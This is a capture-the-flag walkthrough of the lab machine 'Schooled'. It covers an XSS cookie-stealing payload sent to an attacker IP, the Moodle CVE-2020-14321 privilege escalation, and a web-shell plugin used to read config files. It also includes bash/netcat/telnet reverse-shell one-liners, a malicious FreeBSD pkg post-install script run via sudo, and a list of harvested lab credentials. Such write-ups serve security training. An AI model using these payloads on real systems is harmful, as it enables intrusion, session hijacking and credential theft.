![](img/Pasted%20image%2020210403175708.png)
# Recon 10.10.10.234

```PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| ssh-rsa 
80/tcp    open  http    syn-ack Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
|_http-favicon: Unknown favicon MD5: 460AF0375ECB7C08C3AE0B6E0B82D717
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx? syn-ack
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=4/3%Time=6068E132%P=x86_64-pc-linux-gnu%r(NU
SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x
SF:08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20mes
SF:sage\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LAND
SF:esk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0
SF:\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC
SF:,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0
SF:fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid\
SF:x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\
SF:x88'\x1a\x0fInvalid\x20message\"\x05HY000");
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
```

```Bash
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.234 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.234 -vvv -oA nmap
```
```Bash
echo "10.10.10.234 schooled.htb">>/etc/hosts
```

```Bash 
feroxbuster --url http://10.10.10.234 --scan-limit 3 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
```

Apache/2.4.46 (FreeBSD) PHP/7.4.15 FreeBSD 20200214 33060/tcp open  mysqlx

Look for subdomains:
```Bash
gobuster vhost -u schooled.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
```
![](img/Pasted%20image%2020210403230711.png)

# www foothold
https://github.com/HoangKien1020/CVE-2020-14321
We find a subdomain moodle, we're account takeover through XSS to get teachers cookie. Upgrade teacher to manager then RCE via plugins (CVE-2020-14321).
Get DB creds from moodle config. Either use local sql or forward port to local machine for 33060, get hash of jamie and crack to SSH.

Create a user account makle sure to use the right email domain that the error shows, enroll in mathematics course  youll see a note from the teacher to have a moodlenet entry in your profile, so we put a cookie grabber in the moodlenet profile box
```html
<img src=x onerror="this.src='http://10.10.16.22:8888/?'+document.cookie; this.removeAttribute('onerror');">
```
we see the teacher checking the profile and snag his cookie
![](img/Pasted%20image%2020210404144601.png)

Put the new cookie into your browser Dev tools under the storage tab when you press CTRL+Shift+i
![](img/Pasted%20image%2020210404163311.png)

[Course enrolments allowed privilege escalation from teacher role into manager role](https://moodle.org/mod/forum/discuss.php?d=407393)
https://github.com/HoangKien1020/CVE-2020-14321


So we go to courses>participants>enroll users button
search for your username , before you press enroll button turn on Burp Intercept and send that to repeater
![](img/Pasted%20image%2020210404153038.png)

In Repeater, change the userlist%5B%5D= manuel's userid of '24' roletoassign parameter from '5' to '1'
![](img/Pasted%20image%2020210404160122.png)

then submit it, and refresh page

![](img/Pasted%20image%2020210404160048.png)
 
 Then enroll Jane as a manager, then go to Lianne's profile and press the login as administrator 
![](img/Pasted%20image%2020210404182754.png)

and go to site administration then plugins >users>define roles then click manager then edit, scroll to the bottom and turn on Burpsuite intercept then change code at the bottom to the code form payload https://github.com/HoangKien1020/CVE-2020-14321

![](img/Pasted%20image%2020210404182845.png)

![](img/Pasted%20image%2020210404183345.png)
then forward it, turn off intercept

site administration > plugins > install plugins

![](img/Pasted%20image%2020210404184514.png)

itll bring you here
http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php
then upload the rce.zip file from
https://github.com/HoangKien1020/Moodle_RCE/raw/master/rce.zip

![](img/Pasted%20image%2020210404185033.png)

continue, then in new tab visit 
http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=whoami

![](img/Pasted%20image%2020210404185355.png)

http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=cat+/usr/local/www/apache24/data/moodle/config.php

 ![](img/Pasted%20image%2020210404190232.png)
 
```
http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.16.22/9001+0>%261'
```
 
 cd to /usr/local/bin/
 ```./python3 -c 'import pty; pty.spawn("/bin/bash")'```

use this oneliner to get it in one shot
```Bash
/usr/local/bin/mysql -u moodle -h localhost -pPlaybookMaster2020 -e"use moodle; select * from mdl_user;""
```
 ![](img/Pasted%20image%2020210404194644.png)
 
 the crack with john and the rockyou.txt and log into SSH

 ![](img/Pasted%20image%2020210404194748.png)

 ![](img/Pasted%20image%2020210404194930.png)
 
 ![](img/Pasted%20image%2020210404195017.png)
 
 # Root
 ### Check yo' privs
 ![](img/Pasted%20image%2020210404202414.png)
 
 We see that jamie has the ability to sudo the pkg binary, searching for 
 http://lastsummer.de/creating-custom-packages-on-freebsd/
 Bascially were gonna take most of his commands and give a different payload
 copy paste all the commands into console, then change stage directory from /tmp/stage to /home/jamie/null/stage   in the first one change the 'pw usermod -n root -s bin/sh' and csh lines to 'cat /root/root.txt >/home/jamie/null/root.txt' without the quotes
 
 ```Bash
STAGEDIR=/home/jamie/null
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}

cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
cat /root/root.txt >/home/jamie/null/root.txt
EOF

cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF

mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist

pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .
sudo  /usr/sbin/pkg install --no-repo-update mypackage-1.0_5.txz
```
![](img/Pasted%20image%2020210406005834.png)

 ```Bash
 pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .
 ```
 itll create a file named mypackage-1.0_5.txz in current directoy
then we use jamies sudo privs to install it 
```Bash
sudo  /usr/sbin/pkg install --no-repo-update mypackage-1.0_5.txz
```
need the --no-repo-update flag because it cant connect out to the internet to update pkg shit
 ![](img/Pasted%20image%2020210406003841.png)
 ![](img/Pasted%20image%2020210406003735.png)
 
 Instead of just cat'ing the root.txt you want a shell as root you can change the 
 ```bash
cat /root/root.txt >/home/jamie/null/root.txt
```
to
 ```Bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.10.16.22 9001 > /tmp/f
 ```
 
 ![](img/Pasted%20image%2020210406010643.png)
 
 or spawn a tty shell for some feedback
 ```python3 -c 'import pty; pty.spawn("/bin/bash")'```
 
 two other ways to get reverse sehll 
 ```Bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.18.0.2 8080 > /tmp/f
 ```
 ```Bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |telnet 172.18.0.2 8080 > /tmp/f
 ```
 
#### Loot
```
jamie : !QAZ2wsx 
moodle : PlaybookMaster2020 
admissions@schooled.htb
phillips_manuel@staff.schooled.htb
illwill@student.schooled.htb Password123!
Jane Higgins http://moodle.schooled.htb/moodle/user/profile.php?id=23
Lianne Carter http://moodle.schooled.htb/moodle/user/profile.php?id=23
Manuel Phillips  http://moodle.schooled.htb/moodle/user/profile.php?id=24
Jamie Borham http://moodle.schooled.htb/moodle/user/profile.php?id=2
```
